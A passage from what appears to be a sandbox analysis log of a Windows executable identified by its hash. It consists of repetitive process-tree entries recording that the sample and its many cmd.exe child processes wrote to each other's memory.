PID 1672 wrote to memory of 940 1672 cmd.exe 367 PID 1672 wrote to memory of 940 1672 cmd.exe 367 PID 1672 wrote to memory of 940 1672 cmd.exe 367 PID 940 wrote to memory of 556 940 cmd.exe 368 PID 940 wrote to memory of 556 940 cmd.exe 368 PID 940 wrote to memory of 556 940 cmd.exe 368 PID 940 wrote to memory of 556 940 cmd.exe 368 PID 1672 wrote to memory of 224 1672 cmd.exe 369 PID 1672 wrote to memory of 224 1672 cmd.exe 369 PID 1672 wrote to memory of 224 1672 cmd.exe 369 PID 1672 wrote to memory of 224 1672 cmd.exe 369 PID 1420 wrote to memory of 1016 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 370 PID 1420 wrote to memory of 1016 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 370 PID 1420 wrote to memory of 1016 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 370 PID 1420 wrote to memory of 1016 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 370 PID 1016 wrote to memory of 668 1016 cmd.exe 372 PID 1016 wrote to memory of 668 1016 cmd.exe 372 PID 1016 wrote to memory of 668 1016 cmd.exe 372 PID 1016 wrote to memory of 668 1016 cmd.exe 372 PID 1016 wrote to memory of 1684 1016 cmd.exe 373 PID 1016 wrote to memory of 1684 1016 cmd.exe 373 PID 1016 wrote to memory of 1684 1016 cmd.exe 373 PID 1016 wrote to memory of 1684 1016 cmd.exe 373 PID 1016 wrote to memory of 112 1016 cmd.exe 374 PID 1016 wrote to memory of 112 1016 cmd.exe 374 PID 1016 wrote to memory of 112 1016 cmd.exe 374 PID 1016 wrote to memory of 112 1016 cmd.exe 374 PID 112 wrote to memory of 308 112 cmd.exe 375 PID 112 wrote to memory of 308 112 cmd.exe 375 PID 112 wrote to memory of 308 112 cmd.exe 375 PID 112 wrote to memory of 308 112 cmd.exe 375 PID 1016 wrote to memory of 1764 1016 cmd.exe 376 PID 1016 wrote to memory of 1764 1016 cmd.exe 376 PID 1016 wrote to memory of 1764 1016 cmd.exe 376 PID 1016 wrote to memory of 1764 1016 cmd.exe 376 PID 1420 wrote to memory of 760 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 377 PID 1420 wrote to memory of 760 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 377 PID 1420 wrote to memory of 760 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 377 PID 1420 wrote to memory of 760 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 377 PID 760 wrote to memory of 1992 760 cmd.exe 379 PID 760 wrote to memory of 1992 760 cmd.exe 379 PID 760 wrote to memory of 1992 760 cmd.exe 379 PID 760 wrote to memory of 1992 760 cmd.exe 379 PID 760 wrote to memory of 1568 760 cmd.exe 380 PID 760 wrote to memory of 1568 760 cmd.exe 380 PID 760 wrote to memory of 1568 760 cmd.exe 380 PID 760 wrote to memory of 1568 760 cmd.exe 380 PID 760 wrote to memory of 1224 760 cmd.exe 381 PID 760 wrote to memory of 1224 760 cmd.exe 381 PID 760 wrote to memory of 1224 760 cmd.exe 381 PID 760 wrote to memory of 1224 760 cmd.exe 381 PID 1224 wrote to memory of 1448 1224 cmd.exe 382 PID 1224 wrote to memory of 1448 1224 cmd.exe 382 PID 1224 wrote to memory of 1448 1224 cmd.exe 382 PID 1224 wrote to memory of 1448 1224 cmd.exe 382 PID 760 wrote to memory of 936 760 cmd.exe 383 PID 760 wrote to memory of 936 760 cmd.exe 383 PID 760 wrote to memory of 936 760 cmd.exe 383 PID 760 wrote to memory of 936 760 cmd.exe 383 PID 1420 wrote to memory of 236 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 384 PID 1420 wrote to memory of 236 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 384 PID 1420 wrote to memory of 236 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 384 PID 1420 wrote to memory of 236 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 384 PID 236 wrote to memory of 1144 236 cmd.exe 386 PID 236 wrote to memory of 1144 236 cmd.exe 386 PID 236 wrote to memory of 1144 236 cmd.exe 386 PID 236 wrote to memory of 1144 236 cmd.exe 386 PID 236 wrote to memory of 1356 236 cmd.exe 387 PID 236 wrote to memory of 1356 236 cmd.exe 387 PID 236 wrote to memory of 1356 236 cmd.exe 387 PID 236 wrote to memory of 1356 236 cmd.exe 387 PID 236 wrote to memory of 1968 236 cmd.exe 388 PID 236 wrote to memory of 1968 236 cmd.exe 388 PID 236 wrote to memory of 1968 236 cmd.exe 388 PID 236 wrote to memory of 1968 236 cmd.exe 388 PID 1968 wrote to memory of 2004 1968 cmd.exe 389 PID 1968 wrote to memory of 2004 1968 cmd.exe 389 PID 1968 wrote to memory of 2004 1968 cmd.exe 389 PID 1968 wrote to memory of 2004 1968 cmd.exe 389 PID 236 wrote to memory of 556 236 cmd.exe 390 PID 236 wrote to memory of 556 236 cmd.exe 390 PID 236 wrote to memory of 556 236 cmd.exe 390 PID 236 wrote to memory of 556 236 cmd.exe 390 PID 1420 wrote to memory of 1916 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 391 PID 1420 wrote to memory of 1916 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 391 PID 1420 wrote to memory of 1916 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 391 PID 1420 wrote to memory of 1916 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 391 PID 1916 wrote to memory of 2000 1916 cmd.exe 393 PID 1916 wrote to memory of 2000 1916 cmd.exe 393 PID 1916 wrote to memory of 2000 1916 cmd.exe 393 PID 1916 wrote to memory of 2000 1916 cmd.exe 393 PID 1916 wrote to memory of 1828 1916 cmd.exe 394 PID 1916 wrote to memory of 1828 1916 cmd.exe 394 PID 1916 wrote to memory of 1828 1916 cmd.exe 394 PID 1916 wrote to memory of 1828 1916 cmd.exe 394 PID 1916 wrote to memory of 1844 1916 cmd.exe 395 PID 1916 wrote to memory of 1844 1916 cmd.exe 395 PID 1916 wrote to memory of 1844 1916 cmd.exe 395 PID 1916 wrote to memory of 1844 1916 cmd.exe 395 PID 1844 wrote to memory of 576 1844 cmd.exe 396 PID 1844 wrote to memory of 576 1844 cmd.exe 396 PID 1844 wrote to memory of 576 1844 cmd.exe 396 PID 1844 wrote to memory of 576 1844 cmd.exe 396 PID 1916 wrote to memory of 2024 1916 cmd.exe 397 PID 1916 wrote to memory of 2024 1916 cmd.exe 397 PID 1916 wrote to memory of 2024 1916 cmd.exe 397 PID 1916 wrote to memory of 2024 1916 cmd.exe 397 PID 1420 wrote to memory of 1116 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 398 PID 1420 wrote to memory of 1116 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 398 PID 1420 wrote to memory of 1116 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 398 PID 1420 wrote to memory of 1116 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 398 PID 1116 wrote to memory of 656 1116 cmd.exe 400 PID 1116 wrote to memory of 656 1116 cmd.exe 400 PID 1116 wrote to memory of 656 1116 cmd.exe 400 PID 1116 wrote to memory of 656 1116 cmd.exe 400 PID 1116 wrote to memory of 608 1116 cmd.exe 401 PID 1116 wrote to memory of 608 1116 cmd.exe 401 PID 1116 wrote to memory of 608 1116 cmd.exe 401 PID 1116 wrote to memory of 608 1116 cmd.exe 401 PID 1116 wrote to memory of 1300 1116 cmd.exe 402 PID 1116 wrote to memory of 1300 1116 cmd.exe 402 PID 1116 wrote to memory of 1300 1116 cmd.exe 402 PID 1116 wrote to memory of 1300 1116 cmd.exe 402 PID 1300 wrote to memory of 1428 1300 cmd.exe 403 PID 1300 wrote to memory of 1428 1300 cmd.exe 403 PID 1300 wrote to memory of 1428 1300 cmd.exe 403 PID 1300 wrote to memory of 1428 1300 cmd.exe 403 PID 1116 wrote to memory of 1448 1116 cmd.exe 404 PID 1116 wrote to memory of 1448 1116 cmd.exe 404 PID 1116 wrote to memory of 1448 1116 cmd.exe 404 PID 1116 wrote to memory of 1448 1116 cmd.exe 404 PID 1420 wrote to memory of 1216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 405 PID 1420 wrote to memory of 1216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 405 PID 1420 wrote to memory of 1216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 405 PID 1420 wrote to memory of 1216 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 405 PID 1216 wrote to memory of 396 1216 cmd.exe 407 PID 1216 wrote to memory of 396 1216 cmd.exe 407 PID 1216 wrote to memory of 396 1216 cmd.exe 407 PID 1216 wrote to memory of 396 1216 cmd.exe 407 PID 1216 wrote to memory of 216 1216 cmd.exe 408 PID 1216 wrote to memory of 216 1216 cmd.exe 408 PID 1216 wrote to memory of 216 1216 cmd.exe 408 PID 1216 wrote to memory of 216 1216 cmd.exe 408 PID 1216 wrote to memory of 1236 1216 cmd.exe 409 PID 1216 wrote to memory of 1236 1216 cmd.exe 409 PID 1216 wrote to memory of 1236 1216 cmd.exe 409 PID 1216 wrote to memory of 1236 1216 cmd.exe 409 PID 1236 wrote to memory of 1952 1236 cmd.exe 410 PID 1236 wrote to memory of 1952 1236 cmd.exe 410 PID 1236 wrote to memory of 1952 1236 cmd.exe 410 PID 1236 wrote to memory of 1952 1236 cmd.exe 410 PID 1216 wrote to memory of 536 1216 cmd.exe 411 PID 1216 wrote to memory of 536 1216 cmd.exe 411 PID 1216 wrote to memory of 536 1216 cmd.exe 411 PID 1216 wrote to memory of 536 1216 cmd.exe 411 PID 1420 wrote to memory of 1576 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 412 PID 1420 wrote to memory of 1576 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 412 PID 1420 wrote to memory of 1576 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 412 PID 1420 wrote to memory of 1576 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 412 PID 1576 wrote to memory of 1000 1576 cmd.exe 414 PID 1576 wrote to memory of 1000 1576 cmd.exe 414 PID 1576 wrote to memory of 1000 1576 cmd.exe 414 PID 1576 wrote to memory of 1000 1576 cmd.exe 414 PID 1576 wrote to memory of 232 1576 cmd.exe 415 PID 1576 wrote to memory of 232 1576 cmd.exe 415 PID 1576 wrote to memory of 232 1576 cmd.exe 415 PID 1576 wrote to memory of 232 1576 cmd.exe 415 PID 1576 wrote to memory of 668 1576 cmd.exe 416 PID 1576 wrote to memory of 668 1576 cmd.exe 416 PID 1576 wrote to memory of 668 1576 cmd.exe 416 PID 1576 wrote to memory of 668 1576 cmd.exe 416 PID 668 wrote to memory of 1684 668 cmd.exe 417 PID 668 wrote to memory of 1684 668 cmd.exe 417 PID 668 wrote to memory of 1684 668 cmd.exe 417 PID 668 wrote to memory of 1684 668 cmd.exe 417 PID 1576 wrote to memory of 1628 1576 cmd.exe 418 PID 1576 wrote to memory of 1628 1576 cmd.exe 418 PID 1576 wrote to memory of 1628 1576 cmd.exe 418 PID 1576 wrote to memory of 1628 1576 cmd.exe 418 PID 1420 wrote to memory of 308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 419 PID 1420 wrote to memory of 308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 419 PID 1420 wrote to memory of 308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 419 PID 1420 wrote to memory of 308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 419 PID 308 wrote to memory of 1068 308 cmd.exe 421 PID 308 wrote to memory of 1068 308 cmd.exe 421 PID 308 wrote to memory of 1068 308 cmd.exe 421 PID 308 wrote to memory of 1068 308 cmd.exe 421 PID 308 wrote to memory of 1788 308 cmd.exe 422 PID 308 wrote to memory of 1788 308 cmd.exe 422 PID 308 wrote to memory of 1788 308 cmd.exe 422 PID 308 wrote to memory of 1788 308 cmd.exe 422 PID 308 wrote to memory of 1876 308 cmd.exe 423 PID 308 wrote to memory of 1876 308 cmd.exe 423 PID 308 wrote to memory of 1876 308 cmd.exe 423 PID 308 wrote to memory of 1876 308 cmd.exe 423 PID 1876 wrote to memory of 1568 1876 cmd.exe 424 PID 1876 wrote to memory of 1568 1876 cmd.exe 424 PID 1876 wrote to memory of 1568 1876 cmd.exe 424 PID 1876 wrote to memory of 1568 1876 cmd.exe 424 PID 308 wrote to memory of 1428 308 cmd.exe 425 PID 308 wrote to memory of 1428 308 cmd.exe 425 PID 308 wrote to memory of 1428 308 cmd.exe 425 PID 308 wrote to memory of 1428 308 cmd.exe 425 PID 1420 wrote to memory of 992 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 426 PID 1420 wrote to memory of 992 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 426 PID 1420 wrote to memory of 992 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 426 PID 1420 wrote to memory of 992 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 426 PID 992 wrote to memory of 1764 992 cmd.exe 428 PID 992 wrote to memory of 1764 992 cmd.exe 428 PID 992 wrote to memory of 1764 992 cmd.exe 428 PID 992 wrote to memory of 1764 992 cmd.exe 428 PID 992 wrote to memory of 848 992 cmd.exe 429 PID 992 wrote to memory of 848 992 cmd.exe 429 PID 992 wrote to memory of 848 992 cmd.exe 429 PID 992 wrote to memory of 848 992 cmd.exe 429 PID 992 wrote to memory of 1144 992 cmd.exe 430 PID 992 wrote to memory of 1144 992 cmd.exe 430 PID 992 wrote to memory of 1144 992 cmd.exe 430 PID 992 wrote to memory of 1144 992 cmd.exe 430 PID 1144 wrote to memory of 1356 1144 cmd.exe 431 PID 1144 wrote to memory of 1356 1144 cmd.exe 431 PID 1144 wrote to memory of 1356 1144 cmd.exe 431 PID 1144 wrote to memory of 1356 1144 cmd.exe 431 PID 992 wrote to memory of 1952 992 cmd.exe 432 PID 992 wrote to memory of 1952 992 cmd.exe 432 PID 992 wrote to memory of 1952 992 cmd.exe 432 PID 992 wrote to memory of 1952 992 cmd.exe 432 PID 1420 wrote to memory of 2004 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 433 PID 1420 wrote to memory of 2004 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 433 PID 1420 wrote to memory of 2004 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 433 PID 1420 wrote to memory of 2004 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 433 PID 2004 wrote to memory of 320 2004 cmd.exe 435 PID 2004 wrote to memory of 320 2004 cmd.exe 435 PID 2004 wrote to memory of 320 2004 cmd.exe 435 PID 2004 wrote to memory of 320 2004 cmd.exe 435 PID 2004 wrote to memory of 1536 2004 cmd.exe 436 PID 2004 wrote to memory of 1536 2004 cmd.exe 436 PID 2004 wrote to memory of 1536 2004 cmd.exe 436 PID 2004 wrote to memory of 1536 2004 cmd.exe 436 PID 2004 wrote to memory of 2000 2004 cmd.exe 437 PID 2004 wrote to memory of 2000 2004 cmd.exe 437 PID 2004 wrote to memory of 2000 2004 cmd.exe 437 PID 2004 wrote to memory of 2000 2004 cmd.exe 437 PID 2000 wrote to memory of 1828 2000 cmd.exe 438 PID 2000 wrote to memory of 1828 2000 cmd.exe 438 PID 2000 wrote to memory of 1828 2000 cmd.exe 438 PID 2000 wrote to memory of 1828 2000 cmd.exe 438 PID 2004 wrote to memory of 304 2004 cmd.exe 439 PID 2004 wrote to memory of 304 2004 cmd.exe 439 PID 2004 wrote to memory of 304 2004 cmd.exe 439 PID 2004 wrote to memory of 304 2004 cmd.exe 439 PID 1420 wrote to memory of 112 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 440 PID 1420 wrote to memory of 112 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 440 PID 1420 wrote to memory of 112 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 440 PID 1420 wrote to memory of 112 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 440 PID 112 wrote to memory of 1912 112 cmd.exe 442 PID 112 wrote to memory of 1912 112 cmd.exe 442 PID 112 wrote to memory of 1912 112 cmd.exe 442 PID 112 wrote to memory of 1912 112 cmd.exe 442 PID 112 wrote to memory of 1744 112 cmd.exe 443 PID 112 wrote to memory of 1744 112 cmd.exe 443 PID 112 wrote to memory of 1744 112 cmd.exe 443 PID 112 wrote to memory of 1744 112 cmd.exe 443 PID 112 wrote to memory of 656 112 cmd.exe 444 PID 112 wrote to memory of 656 112 cmd.exe 444 PID 112 wrote to memory of 656 112 cmd.exe 444 PID 112 wrote to memory of 656 112 cmd.exe 444 PID 656 wrote to memory of 608 656 cmd.exe 445 PID 656 wrote to memory of 608 656 cmd.exe 445 PID 656 wrote to memory of 608 656 cmd.exe 445 PID 656 wrote to memory of 608 656 cmd.exe 445 PID 112 wrote to memory of 1568 112 cmd.exe 446 PID 112 wrote to memory of 1568 112 cmd.exe 446 PID 112 wrote to memory of 1568 112 cmd.exe 446 PID 112 wrote to memory of 1568 112 cmd.exe 446 PID 1420 wrote to memory of 1728 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 447 PID 1420 wrote to memory of 1728 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 447 PID 1420 wrote to memory of 1728 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 447 PID 1420 wrote to memory of 1728 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 447 PID 1728 wrote to memory of 1224 1728 cmd.exe 449 PID 1728 wrote to memory of 1224 1728 cmd.exe 449 PID 1728 wrote to memory of 1224 1728 cmd.exe 449 PID 1728 wrote to memory of 1224 1728 cmd.exe 449 PID 1728 wrote to memory of 436 1728 cmd.exe 450 PID 1728 wrote to memory of 436 1728 cmd.exe 450 PID 1728 wrote to memory of 436 1728 cmd.exe 450 PID 1728 wrote to memory of 436 1728 cmd.exe 450 PID 1728 wrote to memory of 396 1728 cmd.exe 451 PID 1728 wrote to memory of 396 1728 cmd.exe 451 PID 1728 wrote to memory of 396 1728 cmd.exe 451 PID 1728 wrote to memory of 396 1728 cmd.exe 451 PID 396 wrote to memory of 216 396 cmd.exe 452 PID 396 wrote to memory of 216 396 cmd.exe 452 PID 396 wrote to memory of 216 396 cmd.exe 452 PID 396 wrote to memory of 216 396 cmd.exe 452 PID 1728 wrote to memory of 1036 1728 cmd.exe 453 PID 1728 wrote to memory of 1036 1728 cmd.exe 453 PID 1728 wrote to memory of 1036 1728 cmd.exe 453 PID 1728 wrote to memory of 1036 1728 cmd.exe 453 PID 1420 wrote to memory of 940 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 454 PID 1420 wrote to memory of 940 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 454 PID 1420 wrote to memory of 940 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 454 PID 1420 wrote to memory of 940 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 454 PID 940 wrote to memory of 1016 940 cmd.exe 456 PID 940 wrote to memory of 1016 940 cmd.exe 456 PID 940 wrote to memory of 1016 940 cmd.exe 456 PID 940 wrote to memory of 1016 940 cmd.exe 456 PID 940 wrote to memory of 1672 940 cmd.exe 457 PID 940 wrote to memory of 1672 940 cmd.exe 457 PID 940 wrote to memory of 1672 940 cmd.exe 457 PID 940 wrote to memory of 1672 940 cmd.exe 457 PID 940 wrote to memory of 1000 940 cmd.exe 458 PID 940 wrote to memory of 1000 940 cmd.exe 458 PID 940 wrote to memory of 1000 940 cmd.exe 458 PID 940 wrote to memory of 1000 940 cmd.exe 458 PID 1000 wrote to memory of 232 1000 cmd.exe 459 PID 1000 wrote to memory of 232 1000 cmd.exe 459 PID 1000 wrote to memory of 232 1000 cmd.exe 459 PID 1000 wrote to memory of 232 1000 cmd.exe 459 PID 940 wrote to memory of 1828 940 cmd.exe 460 PID 940 wrote to memory of 1828 940 cmd.exe 460 PID 940 wrote to memory of 1828 940 cmd.exe 460 PID 940 wrote to memory of 1828 940 cmd.exe 460 PID 1420 wrote to memory of 1684 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 461 PID 1420 wrote to memory of 1684 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 461 PID 1420 wrote to memory of 1684 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 461 PID 1420 wrote to memory of 1684 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 461 PID 1684 wrote to memory of 208 1684 cmd.exe 463 PID 1684 wrote to memory of 208 1684 cmd.exe 463 PID 1684 wrote to memory of 208 1684 cmd.exe 463 PID 1684 wrote to memory of 208 1684 cmd.exe 463 PID 1684 wrote to memory of 1900 1684 cmd.exe 464 PID 1684 wrote to memory of 1900 1684 cmd.exe 464 PID 1684 wrote to memory of 1900 1684 cmd.exe 464 PID 1684 wrote to memory of 1900 1684 cmd.exe 464 PID 1684 wrote to memory of 1068 1684 cmd.exe 465 PID 1684 wrote to memory of 1068 1684 cmd.exe 465 PID 1684 wrote to memory of 1068 1684 cmd.exe 465 PID 1684 wrote to memory of 1068 1684 cmd.exe 465 PID 1068 wrote to memory of 1788 1068 cmd.exe 466 PID 1068 wrote to memory of 1788 1068 cmd.exe 466 PID 1068 wrote to memory of 1788 1068 cmd.exe 466 PID 1068 wrote to memory of 1788 1068 cmd.exe 466 PID 1684 wrote to memory of 1392 1684 cmd.exe 467 PID 1684 wrote to memory of 1392 1684 cmd.exe 467 PID 1684 wrote to memory of 1392 1684 cmd.exe 467 PID 1684 wrote to memory of 1392 1684 cmd.exe 467 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 468 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 468 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 468 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 468 PID 1192 wrote to memory of 288 1192 cmd.exe 470 PID 1192 wrote to memory of 288 1192 cmd.exe 470 PID 1192 wrote to memory of 288 1192 cmd.exe 470 PID 1192 wrote to memory of 288 1192 cmd.exe 470 PID 1192 wrote to memory of 212 1192 cmd.exe 471 PID 1192 wrote to memory of 212 1192 cmd.exe 471 PID 1192 wrote to memory of 212 1192 cmd.exe 471 PID 1192 wrote to memory of 212 1192 cmd.exe 471 PID 1192 wrote to memory of 832 1192 cmd.exe 472 PID 1192 wrote to memory of 832 1192 cmd.exe 472 PID 1192 wrote to memory of 832 1192 cmd.exe 472 PID 1192 wrote to memory of 832 1192 cmd.exe 472 PID 832 wrote to memory of 936 832 cmd.exe 473 PID 832 wrote to memory of 936 832 cmd.exe 473 PID 832 wrote to memory of 936 832 cmd.exe 473 PID 832 wrote to memory of 936 832 cmd.exe 473 PID 1192 wrote to memory of 204 1192 cmd.exe 474 PID 1192 wrote to memory of 204 1192 cmd.exe 474 PID 1192 wrote to memory of 204 1192 cmd.exe 474 PID 1192 wrote to memory of 204 1192 cmd.exe 474 PID 1420 wrote to memory of 1144 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 475 PID 1420 wrote to memory of 1144 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 475 PID 1420 wrote to memory of 1144 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 475 PID 1420 wrote to memory of 1144 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 475 PID 1144 wrote to memory of 1456 1144 cmd.exe 477 PID 1144 wrote to memory of 1456 1144 cmd.exe 477 PID 1144 wrote to memory of 1456 1144 cmd.exe 477 PID 1144 wrote to memory of 1456 1144 cmd.exe 477 PID 1144 wrote to memory of 1492 1144 cmd.exe 478 PID 1144 wrote to memory of 1492 1144 cmd.exe 478 PID 1144 wrote to memory of 1492 1144 cmd.exe 478 PID 1144 wrote to memory of 1492 1144 cmd.exe 478 PID 1144 wrote to memory of 1016 1144 cmd.exe 479 PID 1144 wrote to memory of 1016 1144 cmd.exe 479 PID 1144 wrote to memory of 1016 1144 cmd.exe 479 PID 1144 wrote to memory of 1016 1144 cmd.exe 479 PID 1016 wrote to memory of 1672 1016 cmd.exe 480 PID 1016 wrote to memory of 1672 1016 cmd.exe 480 PID 1016 wrote to memory of 1672 1016 cmd.exe 480 PID 1016 wrote to memory of 1672 1016 cmd.exe 480 PID 1144 wrote to memory of 228 1144 cmd.exe 481 PID 1144 wrote to memory of 228 1144 cmd.exe 481 PID 1144 wrote to memory of 228 1144 cmd.exe 481 PID 1144 wrote to memory of 228 1144 cmd.exe 481 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 482 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 482 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 482 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 482 PID 668 wrote to memory of 992 668 cmd.exe 484 PID 668 wrote to memory of 992 668 cmd.exe 484 PID 668 wrote to memory of 992 668 cmd.exe 484 PID 668 wrote to memory of 992 668 cmd.exe 484 PID 668 wrote to memory of 2028 668 cmd.exe 485 PID 668 wrote to memory of 2028 668 cmd.exe 485 PID 668 wrote to memory of 2028 668 cmd.exe 485 PID 668 wrote to memory of 2028 668 cmd.exe 485 PID 668 wrote to memory of 208 668 cmd.exe 486 PID 668 wrote to memory of 208 668 cmd.exe 486 PID 668 wrote to memory of 208 668 cmd.exe 486 PID 668 wrote to memory of 208 668 cmd.exe 486 PID 208 wrote to memory of 1900 208 cmd.exe 487 PID 208 wrote to memory of 1900 208 cmd.exe 487 PID 208 wrote to memory of 1900 208 cmd.exe 487 PID 208 wrote to memory of 1900 208 cmd.exe 487 PID 668 wrote to memory of 2012 668 cmd.exe 488 PID 668 wrote to memory of 2012 668 cmd.exe 488 PID 668 wrote to memory of 2012 668 cmd.exe 488 PID 668 wrote to memory of 2012 668 cmd.exe 488 PID 1420 wrote to memory of 1496 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 489 PID 1420 wrote to memory of 1496 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 489 PID 1420 wrote to memory of 1496 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 489 PID 1420 wrote to memory of 1496 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 489 PID 1496 wrote to memory of 1876 1496 cmd.exe 491 PID 1496 wrote to memory of 1876 1496 cmd.exe 491 PID 1496 wrote to memory of 1876 1496 cmd.exe 491 PID 1496 wrote to memory of 1876 1496 cmd.exe 491 PID 1496 wrote to memory of 2024 1496 cmd.exe 492 PID 1496 wrote to memory of 2024 1496 cmd.exe 492 PID 1496 wrote to memory of 2024 1496 cmd.exe 492 PID 1496 wrote to memory of 2024 1496 